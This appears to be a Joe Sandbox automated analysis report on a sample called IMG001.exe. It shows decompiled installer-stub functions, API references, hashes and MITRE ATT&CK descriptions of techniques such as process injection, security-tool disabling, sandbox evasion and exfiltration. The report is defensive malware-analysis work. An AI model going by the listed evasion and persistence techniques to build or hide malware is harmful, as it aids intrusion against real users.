Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 26e78c3d9df5a16786ed3cc69525262c0a3a935cb00965a02e1ab4ccdd4dd0e2
Instruction ID: ffd816cecff8be56212b11ff967eb8f2096358bc1c946807502b86a71eb66cdf
Opcode Fuzzy Hash: 26e78c3d9df5a16786ed3cc69525262c0a3a935cb00965a02e1ab4ccdd4dd0e2
Instruction Fuzzy Hash: 1F01677090020DBBDB149F60DD09FAE3779BB04745F008039FA16B92D1D7B8AA158F99

Uniqueness

Uniqueness Score: -1.00%

Function 00405C52, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C52(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405550(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E0040550E("*?|<>/\":", _t5))) == 0) {
							E00405688(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextA.USER32(?,*?|<>/":,00000000,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CAA
CharNextA.USER32(?,?,?,00000000), ref: 00405CB7
CharNextA.USER32(?,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CBC
CharPrevA.USER32(?,?,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CCC

Strings

*?|<>/":, xrefs: 00405C9A

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 7689e4b4801a359f66f53c78b0d93180a9ac7ee38d4886d9260c1dcf5575a0d1
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: B311BF5180DB952EFB3216280C44B77BF99CB97B64F18487BE8C4722C2D67C5C429A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405577, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405577(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405329
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E0040550E(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

APIs

CharNextA.USER32()S@,?,007BA4B8,00000000,004055DB,007BA4B8,007BA4B8,?,?,00000000,00405329,?,007EE000,00000000), ref: 00405585
CharNextA.USER32(00000000), ref: 0040558A
CharNextA.USER32(00000000), ref: 00405599

Strings

)S@, xrefs: 00405580, 00405584

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: CharNext
String ID: )S@
API String ID: 3213498283-798485370
Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction ID: 986bac38fae6e29e8d308ce63eb2e299cdb348cdc64b8b0e232f7fb5ff74d272
Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction Fuzzy Hash: 91F0A791D05A21B7F72222644C49B6F5BADDB59710F140477E100B61D592BC4C82CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBE, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x79e458; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7c56ac;
						if(_t2 >  *0x7c56ac) {
							_t3 = CreateDialogParamA( *0x7c56a0, 0x6f, 0, E00402B3B, 0);
							 *0x79e458 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D4B(0);
					}
				} else {
					_t6 =  *0x79e458; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79e458 = 0;
					return _t6;
				}
			}

APIs

DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
GetTickCount.KERNEL32 ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 88874edf8a5ad3d13e020ee7241d07db47261e91eb3adacc12eef60140851430
Instruction ID: 80c895a4a2db25b88506b6249782dcc22a13088abbe972e09fee96e79beaf169
Opcode Fuzzy Hash: 88874edf8a5ad3d13e020ee7241d07db47261e91eb3adacc12eef60140851430
Instruction Fuzzy Hash: 3FF0DA309096A0ABD651AF14BD4CD9B7B64AB09B11750843BF400B62E8DA7C78C18AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405250, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405250(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7bccb8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x7bccb8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405259
0x00405275
0x0040527d
0x00405282
0x00000000
0x00405288
0x0040528c

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007BCCB8,Error launching installer), ref: 00405275
CloseHandle.KERNEL32(?), ref: 00405282

Strings

Error launching installer, xrefs: 00405263

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a806c5310e6df0cebd73b3ad197dac461c1311b4ac174aae17594d044691e1cb
Instruction ID: 0073a5a0efbfdaf5d9279cd3ea2a775c5bd0ec7cfa46b84911e87675a244a577
Opcode Fuzzy Hash: a806c5310e6df0cebd73b3ad197dac461c1311b4ac174aae17594d044691e1cb
Instruction Fuzzy Hash: E0E0ECB4904209ABEB019FA4DD09EAB7BBCFB14304B008526BD15E2250D778D4108A79

Uniqueness

Uniqueness Score: -1.00%

Function 0040563C, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040563C(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405648
0x0040564a
0x00405672
0x00405657
0x0040565c
0x00405667
0x00000000
0x00405684
0x00405670
0x00405670
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405643
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565C
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040566A
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405673

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 609bff5e62adcd4a62841177b0e089267a8c05f8bacb5303162b42a917934155
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 97F05C36209C919FC2025B344C04E2F6F98EF92318B54097AF444F3140D3369C119BBF

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IMG001.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Sigma Overview

Signature Overview

AV Detection:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

